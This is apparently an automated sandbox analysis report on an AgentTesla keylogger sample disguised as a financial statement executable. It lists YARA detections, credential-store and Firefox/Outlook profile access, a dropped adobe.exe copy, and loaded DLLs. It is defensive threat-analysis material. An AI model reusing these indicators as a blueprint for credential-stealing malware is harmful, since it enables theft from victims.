                    Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs Statement of Account - USD 16,720.00.exe
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4484033977.0000000000B59000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Statement of Account - USD 16,720.00.exe
                    Source: Statement of Account - USD 16,720.00.exeBinary or memory string: OriginalFilenameFixo.exe* vs Statement of Account - USD 16,720.00.exe
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Statement of Account - USD 16,720.00.exe, RandomClothingAttributesxc.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@2/2
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile created: C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: NULL
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Statement of Account - USD 16,720.00.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Statement of Account - USD 16,720.00.exeVirustotal: Detection: 33%
                    Source: Statement of Account - USD 16,720.00.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile read: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe "C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess created: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe "C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess created: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe "C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
